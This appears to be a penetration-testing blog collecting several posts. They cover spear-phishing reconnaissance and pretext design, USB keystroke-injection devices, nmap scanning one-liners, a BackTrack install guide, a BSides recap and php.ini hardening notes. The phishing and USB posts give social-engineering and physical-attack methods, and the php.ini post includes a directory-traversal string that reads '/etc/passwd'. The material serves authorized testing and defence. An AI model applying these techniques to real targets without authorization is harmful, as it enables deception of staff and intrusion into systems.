
Welcome to PenTesticles.com

Hello, and welcome to PenTesticles.com. I have finally gotten around to writing a few blog posts and shall be slowly unleashing them upon the world. Any comments welcome and feedback positive or negative always enjoyed. Also, anyone who wants to guest post is welcome to, just tweet me @pentesticles.

Lawrence (and Ben)

Real-life Challenges in Social Engineering as a Penetration Tester


Background

Recently, I’ve been lucky enough to get to work with some interesting clients who’ve wanted some quite openly scoped social engineering tests. It’s not something I do on a really regular basis, but it’s always been a big area of interest and it’s something I enjoy and have hopefully improved at over the last two-and-a-half years.

That said, I’m no guru and neither do I profess that I’m doing anything super-new or revolutionary; I just hope that this helps some other testers out there who’re facing similar challenges and opens the door to a few discussions and interesting comments. Any feedback or shouts of ‘n00b’ will be eagerly met with an open ear. However, I digress. The following posts are a bit of a ‘brain-spuzz’ covering how I’ve constructed some of the testing pretexts and discussing what works (and more importantly what doesn’t) when trying to launch a successful social engineering campaign. This is a particularly effective way of attacking organisations that have effective network perimeter controls.

However, in the money-centric world of IT, it’s often hard to get buy-in to the idea that testing this sort of attack vector is a) fair or b) representative of what’s happening in the wild (especially in the context of large or public sector organisations). It can often be very difficult in pre-sales meetings to ‘tack on’ a few extra days to conduct social engineering, let alone scope a comprehensive engagement, as many info sec managers are quite old-school (or constrained by budget) and prefer to leave this out of scope. One technique to encourage inclusion is to make social engineering implicit in your testing methodology by presenting a scope where social engineering is intertwined with other areas of assessment. This can be either technical (such as creating website clones) or processual (such as spoofing a phone call to a service desk to persuade them to give you password reset information) – I’m not saying these are the only areas of social engineering, but it’s one way to split things out quite generally without thinking too deeply about specific attacks. Blended attacks, rather than staged modular ones, are (in my humble opinion) much more effective and better value for clients.

Spear Phishing – Part 1 – OSINT and Pretexting

Firstly, as I’m sure most testers, IT security folks and Wikipedophiles are aware, Spear Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication which is specifically tailored to entice a user to perform an action that will compromise their data and/or client machine. Information specific to the individual(s) targeted is gathered and used to elicit a specific response desired by the attacker, for example opening a PDF or clicking on a link.

The idea for these posts came after a recent engagement with a client, which called specifically for a tailored Spear Phishing attack, with no prior information pertaining to the targets, apart from a company name and website. Although this seems fairly contrived, when given a short time-scale it may be best to agree a single attack vector with the client as it will set some boundaries but also keep you on track and stop the ‘magpie effect’, which I know a lot of testers suffer from. The downside of this approach is that it will remove a lot of creativity, which can often spawn the best attacks.

With very little information provided, the obvious place to start is footprinting (or OSINT gathering), as is fairly standard (when looking at methodologies such as the rather bloated OSSTMM and new kid on the block PTES). The first tool I always reach for in this scenario is FOCA. I have moved away from Maltego somewhat after annoying licensing issues with transforms, impossible-to-obtain API keys and their development effort seeming to push towards visualisation of data structures. However, a great presentation of the latest release by Roelof at 44Con may persuade me to try again.

FOCA is an amazing tool; it has many interesting functions (some only available in the pro version), but the part that will be of most interest is document grabbing and metadata extraction. It is possible to point FOCA at a URL and for it to locate and then download (if instructed) all the files on the site and extract all the metadata from the documents. If you’re not familiar with the type of information contained within the metadata of office documents and PDFs, you will probably be surprised at the things you can find (e.g. usernames, software versions, internal paths and email addresses). The main value of this is that it provides reams of data pertaining to the internal workings of the organisation you’re targeting. Information such as usernames can help you work out the naming convention they’re using for AD, for example. Moreover, cross-referencing the usernames with machine names and email addresses means that you can start building up individual profiles of your targets, which can then be combined with more generic social media and Google searches to create detailed anthologies of your targets. If there is more time at this stage, I would recommend using Maltego with some of the information gathered, as this sort of cross-referencing is what the tool is good at. In terms of information gathering, a really good tool for storing all the raw information in is ‘BasKet’; those of you who’ve read ‘Social Engineering: The Art of Human Hacking’ by Chris Hadnagy will already be familiar with this tool. However, if your base OS is Windows, OneNote in MS Office is also great as an informational dumping ground and note-taking muse.
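
FOCA itself is point-and-click, but if you’re stuck on a Linux box or just want something scriptable, a rough command-line equivalent is a spider-and-extract combo. This is only a sketch: the target URL and download directory are made up, and it assumes wget and exiftool are installed.

# pull down common document types from the target site (depth and file types to taste)
wget -r -l 2 -A pdf,doc,docx,xls,xlsx,ppt,pptx -P downloads http://www.example.com/

# dump the interesting metadata fields (usernames, authoring software, paths) from everything grabbed
exiftool -r -Author -Creator -Producer -LastModifiedBy -Software downloads/

It won’t give you FOCA’s cross-referencing, but it’s enough to start building the username and software-version lists mentioned above.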

Once the profiling is complete or, more importantly, the time you have allocated for this phase of testing is up, it’s a good time to start conceiving of a pretext for the attack (if you haven’t already). Pretexting, as defined by Hadnagy, is “the act of creating an invented scenario to persuade a targeted victim to release information or perform some action”. Inventing a believable pretext is often more tricky than it sounds, but it’s key to eliciting the desired response from the target. This is the point at which all the scraps of information you have gathered become important, as a straightforward pretext that is directly related to your targets is more likely to work. A goldmine of information I have found useful is the LinkedIn search using the ‘updates’ filter. Organisations are using LinkedIn more and more and you’d be surprised at some of the internal discussions that happen on public forums. Obviously, this is no substitute for solid Googling techniques, Twitter traipsing and Bing bashing, but it’s a good starting place and my ‘top tip’. Once you have done this a few times, the right subjects tend to jump out at you.

When you have found something suitably ‘buzzy’ or controversial that will tweak people’s interest enough to invoke a response, it’s time to start thinking about logically combining a PDF or a malicious URL to the pretext. Key questions to ask yourself are:

Who would send information pertaining to this pretext, based on my research?
Who would receive this email?
What would motivate the targets to open the email / attachment?

An example of a good pretext I have used was created using LinkedIn. I saw that the organisation had upset quite a few people over a new policy change that would affect a lot of people in the industry and the public. The inner decision-making process was exposed by staff discussions attacking and defending the organisation. These types of people are great targets as they’re obviously vocal on the topic, so the appearance of an email from someone high up in the company (perhaps with a fake email chain below saying ‘<insertname> has some great ideas on this’) will be too enticing to miss; even if it’s been blocked by a third party email filter and held in quarantine!

With those questions answered, you’re in a good place to create a plan of attack and start addressing technical aspects of the test (which I’m sure most testers will have been doing all along). I think that’s enough for part one of this mini-series; part two will be a lot more technical and discuss the selection of a delivery method (Gmail, Sendmail or another form of open relay), payload (reverse shells etc.), avoiding detection (encoding etc.) and the effectiveness of the MSF and SET frameworks against defence-in-depth protection. I hope this isn't boring people already!

PHUKDs - An Oldie but a Goodie!

A topic I’ve wanted to blog about for a while is the use of PHUKDs (Programmable HID USB Keystroke Dongles) as an attack vector in penetration testing. Firstly, I’d like to discuss the background of how these devices work and why they have come into being.

A PHUKD is a USB device which is configured in such a way that it presents itself to the victim machine as a USB keyboard/mouse. The reason this has been developed is so that even when autorun.inf and U3 are disabled on a machine, malicious input can be delivered to the victim quickly, accurately and in an automated fashion. Therefore, the key benefits of these devices as delivery systems are that they cannot be blocked by disabling U3 and autorun, and that keystrokes can be precompiled and run quickly on the target machine.

The key benefits to a pen tester:

  • Extremely fast keystrokes, without errors. This is important when physical access time to the target is limited.
  • Works even if U3 autorun is turned off.
  • Draws less attention than sitting down in front of the terminal would. The target turns their head for a minute, the pen-tester plugs in the PHUKD.
  • The HID can also be set as a logic or time-bomb.
  • It is possible to embed a hub and a flash drive in your package so that you have storage and the programmable USB HID into a single package.
  • Embed your device in a USB toy or peripheral and give it to your target as a 'gift'. Packaging that looks like a normal thumb drive is also an option.
  • After your Trojan USB device is in place, program it to "wake up", mount on-board storage, run a program that fakes an error to cover what it is doing (fake BSOD for example).
I still think that these are completely relevant devices and really effective if you can penetrate the borders of an organisation on a test.

A detailed guide on creating PHUKDs is available on the link provided above to irongeek’s blog post and a really interesting video from an old DefCON talk is included below. It’s also worth noting that it’s possible to integrate this attack using Metasploit. The full details of their Teensy USB HID Attack Vector are available here.

SID de-duplication

On the 3rd November 2009, Sysinternals retired ‘NewSID’, a utility that changes a computer’s machine Security Identifier (machine SID), but why? I still see people changing the SIDs of cloned virtual machines as a standard task, but does it really need to be done?

What is a SID?

A Security Identifier (commonly abbreviated to SID) is a unique name (an alphanumeric character string) which is assigned by a Windows Domain controller during the log on process that is used to identify a subject, such as a user or a group of users in a network of NT/2000 systems.

How are duplicate SIDs created?

For those who are unfamiliar with the concept, when machines are cloned using imaged systems the new machine will contain the same SID as the original. If two machines have the same machine SID, then accounts or groups on those systems might have the same SID.

Common sense in de-duplication?

As most IT professionals who work with virtual technologies will attest, when creating virtual machines from templates, conventional wisdom dictates that the new machine’s SID must be changed as the clone retains a facsimile of the parent’s. However, Mark Russinovich (Microsoft Fellow, OS guru and creator of ‘NewSID’) and Microsoft have delved deeper into this idea and concluded that changing the SID of machines that contain facsimile entries is unnecessary. This came to light when Mark was investigating bugs with NewSID in Windows Vista: he realised that he could not conceive of a scenario where duplicate SIDs could cause a security risk / vulnerability. Mark took this concept to Microsoft’s Windows security and deployment teams and no one could come up with a scenario where two systems with the same machine SID, whether in a Workgroup or a Domain, would cause an issue; further investigation by Microsoft is yet to find such a risk. Food for thought next time you clone a machine.

To view the entire article, please see Mark’s blog:

http://blogs.technet.com/markrussinovich/archive/2009/11/03/3291024.aspx

Facebook and Google Installed on my Windows 7 Machine?


As a fairly utilitarian Windows user, I like to have my machine stripped down with a lot of bells and whistles turned off. Especially all the hindrances, I mean 'simplifying features' that Microsoft have added in more contemporary versions.

 As most advanced users of Windows know, to keep it running well requires quite a lot of forethought and maintenance; especially if you're using it for testing when a very specific Windows-only tool is required or Linux-Java-Fails ensue. I regularly check my boot options, what services are running and what will run at start-up using msconfig.exe. This is a great little tool (if you don't already know it) that's built into Windows and gives a very simple view of what's going on. This can be launched from 'run' or in Windows Vista and later, by typing it into the search box on the start menu and hitting enter.

I checked msconfig recently, and found that two new services had appeared, one listed as Facebook Update and one listed as Google Update. My first reaction was that I'd been pwned, perhaps by one of the niche fetish porn websites I frequent or all the emails from dead relatives in Asia who've left me millions(?). However, upon further investigation (Googling for 30 seconds), I discovered that they were indeed genuine (in my case). I just wanted to share this with anyone who isn't aware and see if anyone knows a bit more about what information they could be gathering alongside performing their special tasks.

FacebookUpdate.exe is concerned with integrations with Skype and other services through Facebook.com, webcam services etc.

Google state that "GoogleUpdate.exe is a software component that acts as a meta-installer and auto-updater in many downloadable Google applications, including Google Chrome. It keeps your programs updated with the latest features. More importantly, GoogleUpdate allows your Google applications to be rapidly updated if security flaws are discovered,"

A summary of the findings is shown below:

FacebookUpdate.exe

Full path on a computer: AppData\Local\Facebook\Update\FacebookUpdate.exe
MD5: 3cbc69a4fa0e2432fafaa559b83dc077
SHA1: 9e550c32bda4ef515336729f4f52e43f1439f9d8
Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Facebook Update: “AppData\Local\Facebook\Update\FacebookUpdate.exe” /c /nocrashserver
Internet connections to: dragon.ak.fbcdn.net, www.download.windowsupdate.com, crl.verisign.com, www.facebook.com. 

More information can be found at: http://greatis.com/blog/not-a-virus/facebookupdate-exe.htm 

GoogleUpdate.exe

Full path on a computer: \AppData\Local\Google\Update\GoogleUpdate.exe
Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Google Update: “AppData\Local\Google\Update\GoogleUpdate.exe /c”
Internet connections: Unknown (probably all sorts!)

More information can be found at: http://googlesystem.blogspot.com/2008/10/invisible-googleupdateexe.html , http://www.ghacks.net/2008/12/28/googleupdateexe/

Obviously, this can, will or even has been hijacked or impersonated (various findings online), so check that they're genuine against the MD5 hashes and file details published by Google and Facebook.

Easter Egg in Burp Suite 1.4.01


After an impromptu iMessage from a hacking bud (poojinky), just as I was closing up Burp for the day after an epic web app test, my day was made a bit more amusing. There may be more, but there is at least one amusing hidden 'feature' in Burp that will give you a chuckle. So, I'll get straight to it...

1. Start up Burp and point the browser you're using it with to any site.
2. Right-click the target IP or URL in 'Target > Site Map' and select 'Simulate manual testing' (my favourite feature I must say, after Intruder).
3. With the manual testing simulator open, click on the window to focus on it.
4. Type 'burp' (without the ''s).
5. LOL.

Props to Dafydd for being a funny guy.

(I would take screenshots for the less familiar, but it would give it away!)

Introductions, Automation and Simplification



OK, so time to introduce myself: I'm Ben (bdpuk). I've been a tester for over 5 years and, like every other tester out there, I spend much more time reading blogs than writing them. This is hopefully about to change.

So my latest obsession is automation and simplification. Put quite simply, getting the grunt work out of the way to make time for the fun stuff. This applies across the board in testing, but really shines through when dealing with internal network assessments or "Evil Insider" type scenarios.

Now I'm not advocating point and shoot ownage, that would be downright irresponsible (see db_autopwn as to why). I'm talking about data collection and aggregation to allow for quick analysis and more to the point less time on customer site.

I think the way this is going to work (if it works at all) is that in each post I'm going to write about a few one-liners or useful tools that can eventually be put together into one all-encompassing framework; the scripts will collect all the required information, process it for use and also hopefully display it in a useful/pretty way. Kind of like a Lego project that you attempt to complete over a few weeks: some weeks you might cover a lot, others nothing, maybe a few drastic revisions here and there, and in the end you might never complete it, but it's the experience that counts, right?

So we're going to start with a subnet, and let's for argument's sake call the subnet 10.10.10.0/24 (one I can remember throughout this series); that'll be our starting point and from here we'll start the datamining. First things first, a lot of tools don't accept CIDR notation (think onesixtyone et al.) so we'll need a list of IPs. Nmap's list scan comes in handy here:

nmap -sL -n 10.10.10.0/24 | grep "Nmap scan" | cut -f 5 -d " " > ~/<target_org>/targets/IPs.txt

To break that down we're using the nmap list command to produce a list of targets without actually scanning them, and then manipulating the output with grep and cut to provide only a list of IPs.

In the file structure we should save it as IPs.txt in a targets folder, something along the lines of:

~/<target_org>/targets/IPs.txt
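
If you're building that skeleton up front (the pingsweeps and port_scans folders get used later in this series too), a quick one-liner saves faffing about later; substitute your own <target_org>:

mkdir -p ~/<target_org>/{targets,pingsweeps,port_scans} && cd ~/<target_org>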

That's a good place to draw this article to a close; it will continue...

Ninja Edit: Part 2 is located here.

Installing BT5 from CLI on Machines Running NVidia Graphics Cards with No Networking (n00b friendly version!)


The following blog post has been created to bring together a lot of information (some of which you may already know) pertaining to installing BackTrack 5 successfully onto systems that have NVidia graphics cards. For the Linux pros out there, you may be thinking ‘LOL WTF n00b! That’s easy, you just set the boot param ‘nomodeset’ in GRUB then do ‘apt-get install nvidia-common’’, but in a lot of cases that won’t work, due to hardware restrictions (e.g. encrypted drives) and the way that Live CDs work. Plus, not everyone has time to Google every issue or knows GRUB parameters off the top of their heads.

The main reason for doing this (apart from just wanting BackTrack installed on your machine – too much to ask?) is that for carrying out certain types of protectively marked work (government stuff) you are required to image and re-image a lot and troubleshooting this sort of process is a real pain in the arse, so I thought I would be nice and put it all in one place. I hope it proves useful!

  •  Insert the BT5 Live CD and select the 4th option on the list (BackTrack Text – Default Boot Text Mode). This differs from the first option as it has ‘nomodeset’ in the kernel parameters, meaning the system will actually boot!
  • Next, find out what graphics card you have installed on your machine; you can do this by typing the following command.
    $ lspci
  •  Download the corresponding driver from the NVidia website (http://www.nvidia.com/Download/index.aspx).
  • Copy the driver script (.run file) onto a FAT32 formatted USB stick.
  • Double click the ‘Install BackTrack’ icon on the Desktop and install BT on the whole disk (set regional options etc.).
  • Once this is complete and you restart, the problem you’ll have now is that you won’t be able to boot into BackTrack as it doesn’t have the correct graphics card driver installed. So, you will need to follow the following steps.
  • Upon bootstrapping, drop into the GRUB menu (either by hitting shift or the down arrow, it depends on your machine).
  • From here you need to find the operating system you have just installed (it should be the top option), and with it highlighted, press ‘E’ to edit the script. 
  • Move the cursor with the direction arrows until you get to the line that starts ‘linux /boot’.
  •  Towards the end of the line (or continued onto the next line), where the file reads ‘quiet splash’, there may be some code with something similar to ‘VGA 740’; if there is, delete it and replace it with ‘nomodeset’. If there is not, just enter ‘nomodeset’ after ‘quiet splash’.
  • Press Ctrl+X to boot the modified grub entry. Backtrack should now boot to the familiar text prompt. From here, we need to source and install the NVidia drivers.
  • Insert the USB stick with the drivers on that you copied over earlier.
  •  Mount the USB stick on your machine and copy the file to your Desktop by following the steps below. Tail the logs using the command below, so that you can see the USB log entries as it’s plugged in:

         $ tail -f /var/log/messages

  •  Plug in the USB device and look for a line similar to this:

      Jan 17 11:53:25 <your-hostname> kernel: [81590.537888] sdb: sdb1

  •  Your device will be named '/dev/<device>', which in this example is '/dev/sdb1'. Create a new directory within /media/ called 'usbdrive' with the following command:

      $ mkdir /media/usbdrive

  • Mount the USB device in this location using:

      $ mount -t vfat /dev/sdb1 /media/usbdrive/

  •  After the USB has been mounted, browse to it to check that the driver file is there, then copy it to your machine:

   $ cp <NVIDIA_Linux_x86_64-XXX.XX.run> /root/Desktop

  • Now, you need to install the drivers, this can be a bit tricky so make sure you follow the steps exactly.
  • Type 'prepare-kernel-sources', as this installation requires the kernel sources to be unpacked for the driver script to run.
  • Copy the ‘include/generated’ folder and all its contents to ‘include/linux’ with the following commands:

   cd /usr/src/linux
   cp -rf include/generated/* include/linux/

  • Run the NVidia driver script using the following command:

     ./NVIDIA_Linux_x86_64-XXX.XX.run --kernel-source-path='/usr/src/linux'

  • This will start the NVidia driver installer. At the first screen click ‘Accept’ to accept the licence agreement.
  • When the installer asks ‘Install NVIDIA’s 32-bit compatibility OpenGL libraries?’, select ‘Yes’.
  • The next prompt will ask if you wish to update your X configuration file, click ‘Yes’.
  • Hopefully, this will now give a successful update message! Click ok and then type ‘startx’ to begin the GUI. 
  • Now, you need to edit '/boot/grub/grub.cfg' to make the boot parameter change permanent. Locate the first entry, delete 'VGA 740' and replace it with 'nomodeset'.
  • Reboot the machine.
  • Shout huzzah / WTF!



The Awkward Sophomore Blog Post - The (first) NMAP Post


I'm back, the other nut from this ballsy pair (that'll be the last time I make those jokes I promise). So where were we? (We were here if you missed the previous post) We had a network range, 10.10.10.0/24 and we'd split the range down into a list of IP addresses for the awkward tools that don't like CIDR notation, that and we've dumped the file into the beginnings of our data file structure. Recap over and on we go.

So what's next? We have a number of set and forget operations that need to run, the kind of data that takes a long time to collect but we need to get anyway, you all know what I'm talking about, the good old full 65535 ports tcp/udp/version/OS scan.

First things first, let's set up some variables; it'll make life easier in the long run and sets a good precedent for when we come to script these things up. First let's set the range, nice and simple in bash; at the prompt type:

root@bt:~# range=10.10.10.0/24

Next we need to set our own IP address so that we can get rid of it, if you're cabled into a subnet the last thing you want to do is panic about a BT5 box on their network when it turns out to be your own. Once again nice and simple at the prompt type:

root@bt:~# myip=`ifconfig eth1 | grep "inet addr:" | cut -d : -f 2 | cut -d " " -f 1`

We can now use both of these going forward. Does anyone here like screen? I like screen, it's a good way of compartmentalising your work and more importantly if you're working on a remote box you can keep your sessions active without using nohup, big bonus.

First let's bang out the pingsweeps; if we're local it's good to have an idea of what's actually responding. There's no point in scanning devices we know from the ARP cache don't exist; of course, if this is remote then skip ahead. The ARP sweep in NMap allows us to do this quite easily:

nmap -sP -PR -vv -n -oA pingsweeps/pingsweep.arp $range --exclude $myip > /dev/null 2>&1 && cat pingsweeps/pingsweep.arp.gnmap | grep Up | cut -f 2 -d " " > targets/targets.txt

For completeness (don't we all love piles of data) let's cover all the ping sweeps, they don't take long.

nmap -sP --send-ip -PE -vv -n -oA pingsweeps/pingsweep.icmpecho -iL targets/targets.txt > /dev/null 2>&1
nmap -sP --send-ip -PP -vv -n -oA pingsweeps/pingsweep.icmptstamp -iL targets/targets.txt > /dev/null 2>&1
nmap -sP --send-ip -PM -vv -n -oA pingsweeps/pingsweep.icmpmask -iL targets/targets.txt > /dev/null 2>&1

Right, now onto the actual scans. Although they take forever and we don't get tangible, workable results from them straight away (watch this space for that), they need to be done. Your scan preferences may differ but I find these acceptable for most engagements.

screen -S "full-tcp" -d -m nmap -sSVC -p- -n -vv -oA port_scans/portscan.tcp.full -i targets.txt --max-retries 1

screen -S "full-udp" -d -m nmap -sU --max-scan-delay 0 --max-retries 1 -n -vv -oA port_scans/portscan.udp.services -i targets.txt

The joy of screen is that these truly are set and forget and at any time you can type screen -r <scan_name> to check their progress (if you feel so inclined) it beats the usual ps -ef | grep nmap that we're all used to or heaven forbid tailing the nohup.out file.

Sidenote: So the big issue with NMap is that if it gets stuck on a host a ctrl-c usually means losing all the results you've gained so far. Seeing as we have a targets file we can write a wrapper that scans each ip address individually, that way if NMap hangs on a host you can ctrl-c and just carry on with the next host. It'll look something like this:

while read line; do nmap -sSVC -p- -n -vv -oA $line.tcp.full $line --max-retries 1; done < targets/targets.txt

Of course, you then have to bring all of the results back together again; there are a few scripts out there that achieve this, and if I can dig one out I'll link it.
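
In the meantime, a crude way of stitching the per-host greppable output back together is just to cat the lot and strip the comment headers; a rough sketch, assuming the loop above has been run from the same directory:

cat *.tcp.full.gnmap | grep -v "^#" | sort -u > port_scans/portscan.tcp.full.merged.gnmap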

Back to the main event. While these scans are completing we need something to be getting on with: how many hosts are running web servers? How many SNMP? Mail servers? Etc. A quick scan alongside the full ones allows us to start getting this data and passing it onto other software quick sharp. Of course you could always use the --top-ports=<1-4000ish> flag, but I prefer to write my own list; this does the job for me:

screen -S "hot-targets" -d -m nmap -sSV -p80,443,25,3389,23,22,21,53,135,139,445,389,3306,1352,1433,1434,1157,U:53,U:161 n -vv -oA port_scans/hot-targets.tcp.services -i targets.txt

The greppable output from here can then be thrown directly into tools like nikto, onesixtyone, skipfish etc.
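
As a flavour of what I mean, something like this pulls every host nmap thinks is running a web service out of the greppable output and drops it into a file ready for the next tool (it keys off the service name nmap guessed, so it'll miss anything it couldn't identify):

grep "/open/tcp//http" port_scans/hot-targets.tcp.services.gnmap | cut -f 2 -d " " | sort -u > targets/webhosts_hot.txt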

Last bit I want to cover off is non-standard web ports. There are a few ways we can cover them off; firstly, we can wait for the full scan to complete and grep for www or http, which would be the most sensible thing to do and should probably be done no matter what. In the meantime we can search for some:

screen -S "webhosts" -d -m nmap -sSV -p 80,443,81,82,8080,8081,8443,8118,3128,280,591,593 -n -vv -oA port_scans/webhosts.tcp.services -i targets.txt

By no means a conclusive list (please add more in the comments/twitter and I'll update) but it's a good starting point.

That'll probably do for now, before you're all NMaped out, next time we'll go through what we can do with this data now we have it.


Edit for Steve:


After a brief chat with @stevelord on Twitter I came to agree that I'd been lazy and left out RTT optimisation for the scanning. It was on my to-do list, but I thought I'd wait and do a clean-up post at some point; well, that point is now. To get an idea of the RTTs for the network you're on you're going to need to do some pinging, and seeing as we have nping, why not use it? What I came up with was this bad boy:


INITRTT=`nping --icmp $(head -5 targets/targets.txt) | grep "Avg rtt" | cut -f 13 -d " " | sort | uniq | awk 'sub("..$", "")' | awk 'NR == 1 { sum=0 }{ sum+=$1;} END {printf "%f\n", sum/NR}' | cut -f 1 -d "."` && MAXRTT=$[INITRTT*4]


This pings the top five hosts in the targets file, averages their RTTs and then multiplies it by 4. This creates the variables INITRTT and MAXRTT and these can then be used in the nmap scans with the flags:


--initial-rtt-timeout ${INITRTT}ms and --max-rtt-timeout ${MAXRTT}ms
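
Folded into the earlier full TCP scan, it would look something like this (just a sketch, reusing the variables and file layout from above):

screen -S "full-tcp" -d -m nmap -sSVC -p- -n -vv -oA port_scans/portscan.tcp.full -iL targets/targets.txt --max-retries 1 --initial-rtt-timeout ${INITRTT}ms --max-rtt-timeout ${MAXRTT}ms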


I hope that helps and that your scans end up a bit faster.

BSides London 2012


Recently, both Ben and I were lucky enough to get our grubby mitts on some BSides tickets, which turned out to be a mixed bag, but was still a very worthwhile and well organised event. Overall, it was well thought-out despite one of the speakers going AWOL (Kizz MyAnthia - Mapping The Penetration Tester's Mind: 0 to Root in 60 Minutes). In fact, to fill this slot Paco Hope (@pacohope) from Cigital filled in, with his really interesting talk around online Gambling security focussing on random number generators and shuffling algorithms. This was, very much, a cheeky bonus.

However, I digress. The conference managed to have plenty going on throughout the day, which meant that even if there wasn’t a talk you were particularly interested in, you could either attempt a CTF (with Campbell @zyx2k) or try your hand at the ubiquitous-at-hacking-cons lock picking table. In addition to the two main tracks of talks, there was also a third track which appeared to be an open forum for impromptu talks, for anyone who had something interesting to say. I really liked the idea of this and I managed to catch two of the talks on there. The first talk I saw on this track was more of a discussion, talking about formal education for hacking and how this would serve the industry. I found this quite interesting, having done a degree and currently reading a master’s by research (MRes) in security- and hacking-related fields. I gladly proffered my experiences, opinions and advice and found it quite ‘nice’ to be able to muse without needing to have a talk prepared. I’d like to see more of this in a formal setting at cons. The second talk I caught in this track was an impromptu SAP overview by Steve Lord (@stevelord). This was a great talk (as much as I hate SAP and have only done one test), but he made some really good points around the in-house lifecycle of SAP customisations, rushed deployments and misapprehensions by large corporate businesses. Awesome. And what a knowledgeable guy to do it all off the cuff.

On the main two tracks, there were two real highlights for me; HTML5 - A Whole New Attack Vector by Robert McArdle (@bobmcardle) and UPnP - The Useful plug and pwn protocol – revisited by Arron Finnon (@f1nux).

McArdle’s talk walked through the most notable features of HTML5 then progressed onto basic attack vectors including the <video> tag and browser pop-ups. Following this, he discussed the concept of browser botnets and the impact of their creation within a corporate environment. This was a particularly appealing talk as HTML5 has been on my ‘to-do’ list for a while now, due in part to the uptake of HTML5 moving at the same rate as IPv6 (what’s the name of that Paula Abdul song with the animated cat?). I often tell myself (and after speaking with other testers I realised that I’m not alone) that it can wait a little bit longer, as there are 101 things (including my job as a Penetration Tester for HP in there somewhere) to research and learn first. However, it’s now leapfrogged a few places up the list. It’s certainly worth going to http://html5security.org/ and reading up on potential vectors and reading some of the white papers. Great job Robert.

F1nux’s UPnP talk was great also. Having been in the independent state of ‘Web-app-land’, in terms of personal research and learning, for the last year it seems, it was great to see new things being done with an older protocol (that likes to say ‘Yes’ – SEVERE lack of ‘Mum jokes’ following this, but maybe my sense of humour never ventured beyond the playground). The talk explored the protocol and the information that is freely given up by supporting devices, and several vectors were discussed regarding home routers and the opening of ports via UPnP. I really want to look at the possibilities of screwing with this in VoIP. I really LOVE this type of low-tech elegant hack (worth mentioning how great @wickedclown is at that sorta thing here!) and F1nux really ripped it up (again).

As much as I hate to be negative about a free con, which was informative, well organised and had a free bar at the end, it’s good to be constructive.

So, my main feedback would be to pick more technical talks, as my feeling was that some of the talks were a bit too ‘social sciencey’ and didn’t really give any information beyond a message or way of thinking that may be counterintuitive at first. I feel that these types of talks can be delivered by anyone with a point of view who’s been hacking, penetrating or researching for a year or more, so I found some of them a bit disappointing. Following on from this, I felt that perhaps the target audience was slightly wrong for me as an experienced penetration tester / security consultant. I felt the con wasn’t so much aimed at people like me, but at people who’re new to the industry or grads. In one talk, asymmetric encryption was explained with Alice and Bob (and Eve); I thought this was a little strange and half-expected Bruce Schneier to jump out from behind the curtain with Alice’s private key.

Overall though, a massive success! Thanks to everyone at BSides for putting on an amazing conference and I look forward to repeatedly hitting CTRL+F5 in my browser next year to get tickets again.

Interesting Directives in php.ini (for Pen Testers and Devs)


For those of you not overly familiar with PHP; php.ini is where you define your settings. As a penetration tester, you should be used to seeing the symptoms of these settings either not being set or being misconfigured. This post aims to pin-point the directives that developers should be familiar with and also show penetration testers the nuts and bolts of the issues they’re seeing so that they may better advise their clients. Feel free to post any more detail or additional directives that you believe should be included.

disable_functions

The disable_functions directive is very important, as it controls which functions are available to be used or abused. When designing an application, if it does not require high-risk functions such as eval(), passthru(), system(), etc., then these functions should be disabled. The disable_functions directive is not affected by Safe Mode; however, only internal functions can be disabled using this directive. User-defined functions are unaffected.

open_basedir

Enabling open_basedir will restrict file access to a specifically defined directory. All file operations will then be limited to what has been specified. It is recommended that any file operations should be located within a certain set of directories. If this is implemented, standard canonicalization for directory traversal e.g. “../../../../etc/passwd” will not work. This directive is not affected by Safe Mode being turned on or off.

When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside the specified directory-tree, PHP will refuse to open it. All symbolic links are resolved, so it's not possible to avoid this restriction with a symlink. If the file doesn't exist then the symlink couldn't be resolved and the filename is compared to (a resolved) open_basedir .

The special value ‘.’ indicates that the working directory of the script will be used as the base-directory. This is, however, a little dangerous as the working directory of the script can easily be changed with chdir().

In httpd.conf, open_basedir can be turned off (e.g. for some virtual hosts) the same way as any other configuration directive with "php_admin_value open_basedir none".
Under Windows, separate the directories with a semicolon; on all other systems, separate them with a colon. As an Apache module, open_basedir paths from parent directories are now automatically inherited.

The restriction specified with open_basedir is a directory name as of PHP 5.2.16 and 5.3.4; previous versions used it as a prefix. This means that "open_basedir = /dir/incl" also allowed access to "/dir/include" and "/dir/incls" if they existed. When you want to restrict access to only the specified directory, end with a slash. For example:

open_basedir = /dir/incl/

The default is to allow all files to be opened.

expose_php

Setting this directive to off will remove the PHP banner (the X-Powered-By header) from the server’s response headers. This is one layer of defence that will obscure the fact that you’re using PHP (from banner grabbing at least), and moreover the version that is being used, and is a good defence-in-depth technique.
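
From the testing side, a quick way to see what a server is leaking is to eyeball the response headers; something along these lines (hostname made up):

curl -sI http://www.example.com/index.php | grep -iE "^(server|x-powered-by)"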

allow_url_fopen

Setting this directive to Off is designed to prevent remote file inclusion vulnerabilities from working. An example of this would be if the $absolute_path variable in the following code example were set to a value such as http://www.randomsite.com; the exploit would fail because allow_url_fopen was set to Off.

include($absolute_path . 'inc/adodb.inc.php');

display_errors

The display_errors directive is a simple but important setting that causes detailed error messages to be shown to the user when an error or exception occurs. This setting should always be switched off in a production environment.

safe_mode

Enabling safe_mode in PHP enforces strict file access checks. This is done by checking the permissions of the owner of the running PHP script against any file access that the script attempts; should the permissions not match, PHP throws a security exception. Safe_mode is commonly used by ISPs so that multiple users can develop their own PHP scripts without risking the integrity of the server.

register_globals

When enabled, register_globals injects user-created scripts with various variables, such as request variables from HTML forms. This, coupled with the fact that PHP doesn't require variable initialisation, makes writing insecure code much easier. A controversial change from PHP 4.2.0 onwards was to set register_globals to OFF rather than ON by default. Reliance on this directive was quite common, and many people didn't even know it existed and simply assumed it was how PHP inherently worked. Even though this was a difficult decision, the PHP community decided to disable it by default. When it is enabled, developers use variables without really knowing for sure where they come from; internal variables defined in the script itself get mixed up with request data sent by users, and disabling register_globals changes this.

NB – register_globals has been deprecated as of PHP 5.3.0 and removed as of PHP 5.4.0.

Summary

